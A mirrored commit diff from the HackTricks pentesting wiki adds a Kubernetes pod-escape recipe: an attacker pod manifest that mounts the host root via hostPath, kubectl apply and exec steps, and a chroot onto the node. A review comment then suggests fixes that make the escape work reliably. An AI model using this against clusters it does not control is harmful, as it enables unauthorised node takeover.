mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
Kubernetes: escaping a pod
This commit is contained in:
parent
fb5375d3ad
commit
2697a28fce
|
@ -259,6 +259,69 @@ https://<Kubernetes_API_IP>:<port>/apis/extensions/v1beta1/namespaces/default/da
|
|||
|
||||
{% page-ref page="../../linux-unix/privilege-escalation/docker-breakout.md" %}
|
||||
|
||||
### Escaping from the pod
|
||||
|
||||
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
|
||||
|
||||
```bash
|
||||
kubectl get pod <name> [-n <namespace>] -o yaml
|
||||
|
||||
```
|
||||
|
||||
Then you create your attack.yaml file
|
||||
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
labels:
|
||||
run: attacker-pod
|
||||
name: attacker-pod
|
||||
namespace: default
|
||||
spec:
|
||||
volumes:
|
||||
- name: host-fs
|
||||
hostPath:
|
||||
path: /
|
||||
containers:
|
||||
- image: ubuntu
|
||||
imagePullPolicy: Always
|
||||
name: attacker-pod
|
||||
volumeMounts:
|
||||
- name: host-fs
|
||||
mountPath: /root
|
||||
restartPolicy: Never
|
||||
|
||||
```
|
||||
[Original source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
|
||||
|
||||
After that you create the pod
|
||||
|
||||
```bash
|
||||
kubectl apply -f attacker.yaml [-n <namespace>]
|
||||
|
||||
```
|
||||
|
||||
Now you can switch to the created pod as follows
|
||||
|
||||
```bash
|
||||
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
|
||||
|
||||
```
|
||||
|
||||
And finally you chroot into the node's system
|
||||
|
||||
```bash
|
||||
chroot /root /bin/bash
|
||||
|
||||
```
|
||||
|
||||
Information obtained from:
|
||||
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
|
||||
[Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
|
||||
|
||||
|
||||
## Sniffing
|
||||
|
||||
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
|
||||
|
|
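Review bot: the attacker pod in this hunk will exit before you can exec into it, because the `ubuntu` container has no `command:` and the spec ends with `restartPolicy: Never`; the image's default `/bin/bash` exits immediately with no TTY, the pod goes to Completed, and the later `kubectl exec -it attacker-pod [-n <namespace>] -- bash` fails. Add a long-running entrypoint to the container, e.g. `command: ["sleep", "infinity"]`, so the pod stays Running. Two smaller inconsistencies in the same hunk: the prose says "create your attack.yaml file" while the apply step reads `kubectl apply -f attacker.yaml`, and the manifest hardcodes `namespace: default` while the apply command offers `[-n <namespace>]`; kubectl apply refuses a manifest whose metadata.namespace disagrees with the -n flag, so either drop the namespace line from the manifest or drop the flag. Worth a sentence of documentation as well: a hostPath mount of `/` is normally rejected by Pod Security admission (baseline/restricted) or a PodSecurityPolicy, and the pod lands on whichever node the scheduler picks, so reaching a specific node needs `nodeName:` (or a nodeSelector) in the spec. Style: `chroot /root /bin/bash` works, but mounting the host filesystem at `/root` shadows the container root's home directory, so a neutral mountPath such as `/host` reads more clearly; also "pathes" in the intro paragraph should be "paths".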